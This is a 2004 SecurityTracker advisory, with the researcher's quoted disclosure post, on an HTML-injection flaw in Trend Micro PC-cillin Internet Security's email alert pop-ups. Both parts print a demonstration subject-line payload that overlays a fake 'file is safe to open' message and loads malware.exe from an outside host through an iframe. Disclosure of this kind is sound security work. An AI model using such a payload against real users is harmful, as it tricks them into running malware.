SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Security)  >   Trend Micro Internet Security Vendors:   Trend Micro
Trend Micro PC-cillin Internet Security Input Validation Flaw Lets Remote Users Spoof Messages
SecurityTracker Alert ID:  1010419
SecurityTracker URL:  http://securitytracker.com/id/1010419
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 8 2004
Impact:   Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 2004
Description:   A vulnerability was reported in Trend Micro's PC-cillin Internet Security. A remote user can send e-mail to spoof messages from the application and potentially cause arbitrary code to be executed.

http-equiv reported that a remote user can send specially crafted HTML in the subject or sender fields to cause a message to be displayed that appears to be a valid message generated by the application.

A demonstration exploit subject field is provided:

Your Safe File<div
style="position:absolute;top:25;left:10;height:300pt;width:300pt;
z-index:+100;font-family:Verdana;font-weight: bold;font-size:
12pt;font-color:green">Trend Micro Internet Security confirms
this file <br>malware.exe is safe to open. Proceed.</div><iframe
src="http://www.malware.com/malware.exe">

A demonstration exploit screenshot is available at:

http://www.malware.com/micronot.png
Impact:   A remote user can spoof messages from the application and potentially cause the target recipient to execute arbitrary code.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.trendmicro.com/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:   Windows (Any)

Message History:   None.

 Source Message Contents
Date:  Mon, 7 Jun 2004 14:29:45 -0000
Subject:  TREND MICRO: The Protector Becomes The Vector Take II




Monday, June 07, 2004

 
<!-- 

1. When the product alerts it creates an html file in the 
temporary file of the user's machine [the so-called "local zone"]

[screen shot: http://www.malware.com/weallcar.png 29KB ]

This html file is viewed from an Internet Explorer "browser  
object" and
indicates what file is problematic.

-->

Further to the examination of this: 

[see: http://securityfocus.com/archive/1/365050/2004-05-28/2004-
06-03/0 ]

It may very well be that alert file while in the temporary 
folder does not in fact run under the so-called "My Computer" 
zone. Previous testing required irritatingly precise manual 
construction of the .zip file with test string therein by the 
counting off the amount of desired html characters to test 
against the name of the file in the .zip and manually modifying 
it accordingly.

While the overall html concept and problem is sound as 
demonstrated, we today find a much easier and default and 
perhaps even worse problem than before.

Incoming Email:

The gadget has a scanning mechanism for incoming email messages 
utilising the exact same alert scheme. In this instance 
everything is set on default and we need not enclose our "bait" 
in a container and fiddle for hours with its name.  We have a 
subject and a sender field. In this case we do like so:

Your Safe File<div 
style="position:absolute;top:25;left:10;height:300pt;width:300pt;
z-index:+100;font-family:Verdana;font-weight: bold;font-size: 
12pt;font-color:green">Trend Micro Internet Security confirms 
this file <br>malware.exe is safe to open. Proceed.</div><iframe 
src="http://www.malware.com/malware.exe">

[screen shot: http://www.malware.com/micronot.png 33KB]

Which should be self-explanatory of only one possibility.

Notes:

1. Using this easier delivery and testing method <object> tag in 
the subject generates an activex warning plus <script>alert()
</script> fails; very strongly suggesting that despite the html 
file being in the local zone, the developers had the foresight 
to have their little Internet Explorer control set at the high 
setting regardless of zoning [might be other reasons including 
these being email vs. web]. Nevertheless:

2. The whole thing is still broken though as frames and images 
render as they should. This completely defeats the security of 
Outlook Express and Outlook which disallow  file downloads, 
external content downloading etc. which this allows on arrival
of the email [not even opening it].

3. Cramming everything into the subject field and modifying 
warning messages as above, all while on default settings can 
prove just as lucrative.

4. There is always away around the mighty Internet Explorer's so-
called 'Security Zone's if not today, then tomorrow.

5. This html 'thing' in the alert mechanism really ought to be 
fixed as soon as possible.


End Call


 

-- 
http://www.malware.com


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC